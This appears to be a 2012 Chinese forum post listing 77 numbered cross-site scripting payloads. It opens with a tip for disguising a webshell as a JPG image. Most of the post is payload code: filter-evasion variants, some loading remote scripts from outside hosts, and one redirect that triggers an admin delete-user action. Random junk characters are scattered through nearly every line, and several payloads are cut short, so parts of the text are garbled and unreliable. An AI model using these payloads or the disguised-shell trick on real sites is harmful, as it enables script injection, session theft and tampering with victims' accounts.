跨站图片shell
3 T: j9 q0 }, y; h0 M( l$ u& T* `XSS跨站代码 <script>alert("")</script>
4 j4 R* j$ w# q& Q# j" V/ X, I2 u+ Y+ c8 t4 C x6 K
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
& H' M$ ~! u' U' S$ X$ x
9 f/ h! |# i) V- l7 F) r: Z) f; ]6 w! p1 y- ]$ V4 W
0 i8 c) C& m4 p2 @) ]
1)普通的XSS JavaScript注入8 W/ V/ `, X& `" H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( [/ a5 R& |/ _4 }3 h- m! F
, f- B, l5 Z+ W) F(2)IMG标签XSS使用JavaScript命令+ F% z$ d5 @! ?" @, u
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 o: g1 x" @( Y2 w5 N% n. H
6 w* X. q- \! r(3)IMG标签无分号无引号- Z b2 ]" U2 X8 j# W: S" d! x( K: K
<IMG SRC=javascript:alert(‘XSS’)>
& V+ l( |; S0 Q; l2 o x6 [& b" j) m M; a6 g; W) y; q8 e9 o
(4)IMG标签大小写不敏感
5 m! n/ ]( Q% x T+ _/ _<IMG SRC=JaVaScRiPt:alert(‘XSS’)>! Q. J6 Q: C3 `* k
; u) C: B7 i/ L: {) ]# l0 s
(5)HTML编码(必须有分号), M- ?1 Z Q7 q8 t+ j2 Y2 J
<IMG SRC=javascript:alert(“XSS”)>8 d1 Y' `) U% m
# |% d4 L5 D; l; _5 x- H* Q( b5 E
(6)修正缺陷IMG标签. g. h7 L0 m v1 s- S1 E F
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 g# ~1 Y/ L6 N" [
$ U/ [* O3 J k( ~1 r" v9 P(7)formCharCode标签(计算器)& G. ]/ l9 k* t# P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* W V3 n0 L% h7 W+ O* \8 c
/ L& m: C1 L$ D(8)UTF-8的Unicode编码(计算器)$ N. O6 G3 A, [$ u( T
<IMG SRC=jav..省略..S')>
7 e4 g4 }( x2 Z* `4 B- m% f; t' a4 o) j4 L& N
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* f: q9 {. q1 `# K, s+ `/ ~/ [" c; k<IMG SRC=jav..省略..S')>$ O6 V$ q6 n" ?% O; ]0 j. g
, \, v/ s* v- F(10)十六进制编码也是没有分号(计算器)' l7 }; S. ?! `: S: x6 {
<IMG SRC=java..省略..XSS')>
2 y G) X4 q. X, ^: i8 y, E: ?# g. M9 W& ?
(11)嵌入式标签,将Javascript分开4 S3 b; Z: C5 S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& K9 B" f; K7 b$ t! @; ]% i- Q( \" Q7 P1 {; _2 k* F, N1 n7 q5 u
(12)嵌入式编码标签,将Javascript分开
0 L- X4 U/ ^, S; r3 v6 T4 }: s<IMG SRC=”jav ascript:alert(‘XSS’);”>+ d) d3 Y. ]# _) p+ v% j1 J
* v/ h8 x b' T8 Q4 J(13)嵌入式换行符4 j& Q6 z+ H( p! F0 D5 t
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ `4 b$ I1 K) `/ R7 F3 ^
9 ^3 I: X3 m1 F+ D# F" F, Y& ^
(14)嵌入式回车
) E0 j% N; Z1 i<IMG SRC=”jav ascript:alert(‘XSS’);”>
- W. V5 f& _9 `' o+ J( g8 t3 i3 Z2 Z: ~2 A5 u& g
(15)嵌入式多行注入JavaScript,这是XSS极端的例子) a7 S# i- u3 p# {" i0 M: ?
<IMG SRC=”javascript:alert(‘XSS‘)”>
; a! Y& M+ w+ d# |2 |' P* b7 n- l5 j2 s4 J3 L# S
(16)解决限制字符(要求同页面); C4 H( X! M* o8 y$ B' I
<script>z=’document.’</script>
5 s6 n' m5 k1 n% ^$ Q) e<script>z=z+’write(“‘</script>
8 [7 \( a+ @, H5 W: Z1 w/ z<script>z=z+’<script’</script>3 o: ~ p+ e- x; F
<script>z=z+’ src=ht’</script>* @ J- i$ I! v0 w; D
<script>z=z+’tp://ww’</script>3 W0 F# k) @5 U$ ~
<script>z=z+’w.shell’</script>
4 w! L% @' }5 y6 v( N5 `9 e<script>z=z+’.net/1.’</script>7 a5 C; z+ J8 m9 @" d5 J9 b
<script>z=z+’js></sc’</script>/ I' l( Y1 \5 g j
<script>z=z+’ript>”)’</script>
3 O' D) x) Q% o: M9 N) G* _4 J7 s1 r<script>eval_r(z)</script>
; G6 v* s% e# ]3 i9 W' T
3 k+ N' @) n( j& |( \9 |& T(17)空字符2 p+ y, L) C |/ F9 y7 F' W
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 N# }) g, i" H0 k
% t# G0 g! m: H7 k+ ^6 w! N8 g(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) `0 c' }, J) sperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out- P* d; H$ U- h; M8 l% C4 |, c4 O
- I5 r; Y2 w$ p9 b8 T
(19)Spaces和meta前的IMG标签
! Z0 @ A- r, T+ F4 A<IMG SRC=” javascript:alert(‘XSS’);”>
/ h! K7 s& S8 G
" R1 T7 L" g, B, [9 S(20)Non-alpha-non-digit XSS; I$ G/ S% B- ]: W
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% t4 | p( C9 d4 J5 K+ N- V f1 ~# \" T$ k2 F4 F4 G
(21)Non-alpha-non-digit XSS to 2
( u4 ?0 A# V$ T' K& N+ V* x! @. B<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% B6 E4 o6 t1 c/ {# E7 b* g) Y% J2 v
(22)Non-alpha-non-digit XSS to 34 e9 _$ E0 \3 |, B
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) h* V0 T0 W6 V
4 S$ U" U. x7 [0 n$ [3 l' j3 E(23)双开括号
1 n/ t, w5 m' J<<SCRIPT>alert(“XSS”);//<</SCRIPT>
7 W, A& E1 e+ R6 j7 r1 i( Y( u
/ S* R7 V' f2 {7 [6 o(24)无结束脚本标记(仅火狐等浏览器)
+ Q3 ~6 N8 {- [. s. j<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. v9 f4 C( H J" E- e$ t
# |, K% X p, w- G7 A) E(25)无结束脚本标记2
4 O6 W6 a& f8 C5 {8 P& Z<SCRIPT SRC=//3w.org/XSS/xss.js>' A% k4 N' ^! K4 F; ^
( A& M; N: ? ^" Z1 V(26)半开的HTML/JavaScript XSS
0 C: \, {9 X. T/ S<IMG SRC=”javascript:alert(‘XSS’)”4 P# a9 ^6 @2 D* Y
/ ^6 d9 v' k/ B/ x9 [+ R) E
(27)双开角括号
* s" I2 a5 J# \8 i<iframe src=http://3w.org/XSS.html <
+ u/ ?8 Q; i/ v5 [: N$ h' i0 S- G
(28)无单引号 双引号 分号
, z6 @3 ~0 y* e! F7 s<SCRIPT>a=/XSS/
9 N3 N9 P' J# h! [alert(a.source)</SCRIPT>& n! V6 ^' r1 e% ^* \0 }' Y
. J" P# L& U9 k; b0 [2 i(29)换码过滤的JavaScript' i7 n2 n9 | N4 C+ m
\”;alert(‘XSS’);//# v! r& n$ ^( M0 \4 J
( E% r, S8 {: Z' K4 l
(30)结束Title标签
4 k- E- _- f# K5 G4 ], ]5 W8 N8 T</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 ~) c. Q9 B, P4 M
. F- _' K6 A/ |0 `
(31)Input Image
' ?9 w( @9 K, w9 m0 G' x) B<INPUT SRC=”javascript:alert(‘XSS’);”>7 y/ c& r# |9 \: d4 P: @( r
) t9 S. Q$ ?3 m ?% b2 {
(32)BODY Image, P0 {2 S" d, _5 K; z/ O
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 Q6 F, J0 c. j" W
: ^6 d" v9 ^$ c, U( }$ a. s" Z; q(33)BODY标签
( V1 f" G6 l- i: B( H9 T<BODY(‘XSS’)>
! U. y3 E4 {7 o5 s) w9 M& d0 L7 v+ p
(34)IMG Dynsrc2 x( e) o, m1 |- ?1 F
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! v v" m8 _% T/ O) P0 g) x5 w& x* N0 ]
(35)IMG Lowsrc' L1 m- H4 \* F" t: U/ |3 ~
<IMG LOWSRC=”javascript:alert(‘XSS’)”>& p2 N8 \2 \( K" Q. b5 [
- Y2 Q O4 |3 E2 Y(36)BGSOUND
+ D" [! }/ T3 H5 t9 h% L- _<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" j1 ]+ R9 Y& |& n' W
: p* ?# W0 U9 e5 {" Q/ L( @% Y1 b( r' {(37)STYLE sheet
" D5 ]+ F9 j6 w2 i<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>* t1 M# N4 B. e4 M- [ j B
2 S2 r( }1 i: L- {* E1 z1 l, K(38)远程样式表
! G/ ]* T$ o- ^7 N U" f<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>- J$ F2 B- Z7 d, r$ ?& W
" W+ y& X; G( }. Z+ v+ X3 \
(39)List-style-image(列表式)! N& Y: Z0 |* G1 k& n2 J' _
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
. y' V5 R* x8 @" Y: A, l# k4 ^+ X( ]/ J8 O4 `; v2 F" g4 ~
(40)IMG VBscript! y. r) ]0 v5 d1 [' h5 z ^% q
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 |% I0 ~$ F( |) W3 A; U: O' w7 @& P i) V
(41)META链接url; n6 Z$ P l y) ]( _# L# ^$ U
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
b! d* c! z" a' u3 m' h# y7 B! U
* K) i0 [$ O) ]8 L(42)Iframe
) O% T/ u( B/ C5 G- W2 r6 y$ g<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>$ j: G! n* D: I S& C' s
(43)Frame
1 I$ F6 ?% V' Y<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>8 H; e; V; S8 a; `( [
' H0 ]3 o9 t( c' Z. g! n& L(44)Table
% {: t" S. Y, i+ _/ y2 p1 c<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& @! Y3 J5 k+ B* V) g2 B
0 F% b3 V* {) P2 C }
(45)TD- p' H8 v! P1 A% W/ F' `: _
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 Y! m: `. S( }- [$ Y0 ]
- i9 u! U; x5 [& l( h(46)DIV background-image
; Z5 L7 V6 M) P+ X7 V/ o<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. s" k* @6 n* ]5 z; w
2 A! h# K- \! W2 q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ f# u. U. o @- F$ p1 K- F. M0 t& `<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>6 ~$ S$ C3 Q0 r( n
# @! Q) c) ~, v, M6 ~4 V- q$ E(48)DIV expression
% Q( m. o- }6 ]+ z7 A2 [6 J<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 t( D4 @, H; p* k# @
+ Y9 u" u' }2 N7 r7 a: ~, \
(49)STYLE属性分拆表达* \* _) `, d- u, k, Y4 T T! j
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>% r& k n7 R' N. n. y
1 f' @" u4 l3 z
(50)匿名STYLE(组成:开角号和一个字母开头)+ ~2 ?4 z) z; A* t2 z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 ^0 I- [$ d4 H1 \
, ?5 E7 f: t; T. e(51)STYLE background-image
- j/ w9 N2 x# u" V0 u<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" b# c0 \1 e* ~
3 E7 `# ?* y: u9 O0 E2 Z6 {(52)IMG STYLE方式
2 m" G! B: U: E0 \; u0 i6 f" C; Oexppression(alert(“XSS”))’>* _- A7 P, U. }; l; s, p. k0 S5 y
, Y \5 R+ A7 j, l- X(53)STYLE background
7 u8 h' y3 d) ?8 V. Y3 o1 o% i<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>8 a- A+ H" |8 Q$ L. t+ P3 I( W7 v+ T- F
, | y+ J! a1 k! h& m2 @5 D
(54)BASE
7 Q3 I+ \( z F% D# J( N6 |<BASE HREF=”javascript:alert(‘XSS’);//”>- X2 F- { s7 I9 m& g8 Q$ i) s0 O
- S3 `( U# \( O. c+ J4 _. W" v; q(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 e1 \, n2 v6 A1 }<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>8 E8 \+ d. K! ~# U5 Z _1 Q' x
4 ^6 F) a2 H6 l) |) n& e* Z6 k% G(56)在flash中使用ActionScrpt可以混进你XSS的代码
6 u7 y8 n1 v- c \+ la=”get”;
& i9 i; k* _/ F& f9 ~b=”URL(\”";
* S9 U/ H8 X: Hc=”javascript:”;4 u& U! n% ^+ {7 I
d=”alert(‘XSS’);\”)”;
" Z% m! Z. h9 B& b1 g5 O8 S. beval_r(a+b+c+d);
. z; G t5 [" h* w O. g- e2 U$ c& R( \
' r( _8 x w/ u( s/ l2 I(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ _/ ]' y( ]4 _<HTML xmlns:xss>/ H5 t5 E) B% e
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>/ h( K. E& s7 l
<xss:xss>XSS</xss:xss>7 J/ K# w1 c- m2 a" I9 j" N% H" W
</HTML>
. u+ \% h: t* P* y7 K0 Z9 u. H' X4 \4 |: x8 |' Z2 M
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 I; \# k: g; B! u<SCRIPT SRC=””></SCRIPT>2 M# k+ ~0 s h' X4 B, X
( r0 @8 {# l8 e5 \. x( E' R& d, L
(59)IMG嵌入式命令,可执行任意命令
1 r- m; n5 z2 m% z% v<IMG SRC=”http://www.XXX.com/a.php?a=b”>
& D) ?% R7 F. E0 e# ?8 V1 q) ^
/ |$ u+ C8 a' y( [* \7 ?(60)IMG嵌入式命令(a.jpg在同服务器)
$ c9 J/ O K7 N5 p: mRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser) ^6 I: j* w8 J
/ r. v" ~2 Z+ K% _: U(61)绕符号过滤/ S, D G8 n. P6 G* Z6 }# p$ T
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; H- E' v0 S* J% x
/ q, w! }% w: l" T& I' g
(62)7 Z* W. d; x- o, ~' O+ T$ |3 v
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# ?7 B& M' Z, H: l; e2 S0 r: g7 X& q& h- [9 @ z" W8 `+ G, }0 q4 ~ y
(63)
/ u* {6 E( L. O5 w, F4 |* }% c. |# N2 z<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
) r! O8 l, [, c( u0 C- p O
+ q* C! v! x; x5 t) w( |(64)
9 Q) I$ I0 X1 {* X' k# D<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& r8 R7 \! e. n; \+ M& X8 y' ~! F6 I6 o j
(65)0 M z, B7 ^+ b2 ?0 y0 X# O
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ f( J8 `5 s1 q, I6 b) `/ z# d# \' ] U2 n+ o' \0 e
(66)
; q2 ]# u6 Q# D4 a<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 e6 |* Y% A: y5 M. \: I& f
) m s: ^ ^2 b' |; R2 j! x(67); W4 }& M- r( g% a8 Q" a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>% l; Z( `9 L) a
! X. @/ K5 u% n8 G; ?* H; d
(68)URL绕行7 c" X1 O3 Z, p! g" P
<A HREF=”http://127.0.0.1/”>XSS</A>$ z6 d! v8 y% ?4 ^% Z! b
% g, U) a3 V- T" @(69)URL编码/ a+ A, E5 V6 {9 f( I7 }
<A HREF=”http://3w.org”>XSS</A>
- @% o( l Q) f& _) R7 [8 r" m" A* B$ ^3 ?1 p- K2 U
(70)IP十进制
3 m. i# Y6 d7 T9 J& k0 T% |$ j<A HREF=”http://3232235521″>XSS</A>. H9 l! ^- ?: ]' S
8 @ x, _) r" a; Y) C( ]4 _
(71)IP十六进制
6 P7 @/ j: o/ }) o<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>' u6 @" H( Z& G6 K7 g; l' [
9 D3 E- k* t( r# U; a
(72)IP八进制) P* q- u- H+ C' Q
<A HREF=”http://0300.0250.0000.0001″>XSS</A>8 j4 `, L4 \( B8 N: `" w0 C) B: ]
$ x1 n( G, b6 l; a1 m- Q(73)混合编码
, s0 u% i' `. Y- Q( Z* G% l0 d<A HREF=”h
0 S- M- |+ A3 `( D+ P2 ~6 E5 Ntt p://6 6.000146.0×7.147/”">XSS</A>
9 \2 U% N6 l% i$ m# [
+ K. R2 q( J, x/ |! i(74)节省[http:]
: p, c9 x3 {/ |* F9 o) W7 ~4 \<A HREF=”//www.google.com/”>XSS</A>) V+ A, |9 E1 U4 l, C
% b$ G {! L! P9 c4 b1 B$ |) [. y(75)节省[www]) I3 q, l4 t4 S- i0 u& G
<A HREF=”http://google.com/”>XSS</A>( R! V: F2 m( p$ O0 x5 z
& o4 Q+ x7 e$ y% M. \- h$ a- e0 x& o(76)绝对点绝对DNS
2 X# x. r/ H0 o( y) ?<A HREF=”http://www.google.com./”>XSS</A>; J% |7 C/ Y' }: O2 Z+ _) D- S
% G$ [$ ~! B; Z(77)javascript链接
1 z( `4 a$ Y2 k d. X<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>- P# x0 H, h4 }
|
发表于 2012-9-13 17:04:56
收藏
支持
反对